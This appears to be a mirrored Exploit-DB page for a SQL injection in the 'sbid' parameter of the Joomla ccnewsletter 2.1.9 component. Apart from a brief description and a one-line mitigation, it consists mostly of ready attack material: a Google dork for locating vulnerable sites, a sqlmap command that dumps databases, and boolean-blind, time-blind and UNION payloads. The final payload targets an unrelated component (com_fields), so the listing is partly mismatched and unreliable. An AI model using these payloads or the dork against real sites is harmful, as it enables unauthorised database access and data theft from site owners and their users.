header-logo
Suggest Exploit
vendor:
ccnewsletter
by:
Shahab Shamsi
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ccnewsletter
Affected Version From: 2.1.9
Affected Version To: 2.1.9
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:ccnewsletter:2.1.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win,Linux
2017

Joomla Component ccnewsletter 2.1.9 – ‘sbid’ Parameter SQL Injection

Joomla Component ccnewsletter 2.1.9 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'sbid' in the URL. This can be exploited using boolean-based blind, time-based blind and UNION query techniques.

Mitigation:

Input validation should be done to prevent SQL injection attacks. Sanitize user input and use parameterized queries.
Source

Exploit-DB raw data:

"Joomla Component ccnewsletter 2.1.9 - 'sbid' Parameter SQL Injection"


# Exploit Title: Joomla Component ccnewsletter 2.1.9 - SQL Injection
# Date: 07-26-2017
# Exploit Author: Shahab Shamsi
# Vendor Homepage: https://extensions.joomla.org/extension/ccnewsletter/
# Version: = 2.1.9 [Final Version]
# Tested on: Win,Linux
# Google Dork: inurl:"index.php?option=com_ccnewsletter" inurl:sbid
# Video Refrence: http://securityman.org/joomla-component-ccnewsletter-2-1-9-sql-injection/
 
 

 
Sqlmap: 
 
sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs
 



Testing Method:
  - boolean-based blind
  - time-based blind
  - UNION query



Parameter: sbid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
    Type: AND/OR time-based blind

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

Navigation

Suggest Exploit

Services By CQR